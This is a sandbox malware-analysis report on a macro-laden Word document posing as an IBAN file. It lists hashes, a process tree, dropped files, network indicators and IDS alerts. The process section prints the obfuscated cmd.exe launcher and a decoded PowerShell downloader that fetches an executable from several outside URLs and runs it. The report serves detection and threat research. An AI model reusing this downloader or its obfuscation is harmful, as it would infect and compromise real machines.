analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE24 3494 2027 7633 3013 10.doc

Full analysis: https://app.any.run/tasks/a16b2bb3-cd2b-4c36-ac72-04e39831d954
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 14, 2018, 16:00:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0
MD5:

DB9E923E7EF2A0CC291CB2F39AA84EC1

SHA1:

139782D81DF725ED100FAA8C1A7F3E15D6256551

SHA256:

B30225895EDAA9B3C379B34411D8B236E3A0CB89B4214C6C06FFA5B3855BF41C

SSDEEP:

1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2948)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2948)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2820)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3520)
    • Application was dropped or rewritten from another process

      • 934.exe (PID: 2640)
      • 934.exe (PID: 3608)
      • archivesymbol.exe (PID: 3852)
      • archivesymbol.exe (PID: 3272)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3520)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1200)
      • cmd.exe (PID: 2684)
      • cmd.exe (PID: 2820)
    • Application launched itself

      • cmd.exe (PID: 2684)
    • Creates files in the user directory

      • powershell.exe (PID: 3520)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3520)
      • 934.exe (PID: 3608)
    • Starts itself from another location

      • 934.exe (PID: 3608)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 04:03:00
ModifyDate: 2018:12:14 04:03:00
Pages: 1
Words: 4
Characters: 26
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 29
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
11
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 934.exe no specs 934.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IBAN_DE24 3494 2027 7633 3013 10.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1200c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2684CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1380C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2820C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3244C:\Windows\system32\cmd.exe /c assoc.psc1C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3520PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2640"C:\Users\admin\AppData\Local\Temp\934.exe" C:\Users\admin\AppData\Local\Temp\934.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3608"C:\Users\admin\AppData\Local\Temp\934.exe"C:\Users\admin\AppData\Local\Temp\934.exe
934.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3272"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe934.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 900
Read events
1 407
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8F55.tmp.cvr
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\772BC050.wmf
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6981ADE.wmf
MD5:
SHA256:
3520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\99DZP0TJT0L9CQLU4VZ8.temp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA35452724684616B.TMP
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D1A4BB2-EE87-4BDB-AEF3-0CCBDB7BB211}.tmp
MD5:
SHA256:
3520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a500.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65E624CB.wmfwmf
MD5:86615E1F8604036617AD3B59D748D666
SHA256:167AF41799A5E7C3726DF24FE901C74436B265C003A146A3E98BB459B8BAAB6F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3520
powershell.exe
GET
503
212.227.94.120:80
http://cipriati.co.uk/w9
DE
html
1.07 Kb
malicious
3852
archivesymbol.exe
GET
201.111.83.186:8080
http://201.111.83.186:8080/
MX
malicious
3520
powershell.exe
GET
301
191.6.198.133:80
http://angullar.com.br/J5OZJ
BR
html
237 b
malicious
3520
powershell.exe
GET
200
191.6.198.133:80
http://angullar.com.br/J5OZJ/
BR
executable
152 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3520
powershell.exe
212.227.94.120:80
cipriati.co.uk
1&1 Internet SE
DE
suspicious
3520
powershell.exe
191.6.198.133:80
angullar.com.br
IPV6 Internet Ltda
BR
malicious
3852
archivesymbol.exe
201.111.83.186:8080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
cipriati.co.uk
  • 212.227.94.120
malicious
angullar.com.br
  • 191.6.198.133
malicious

Threats

PID
Process
Class
Message
3520
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3520
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3520
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3520
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3520
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3520
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info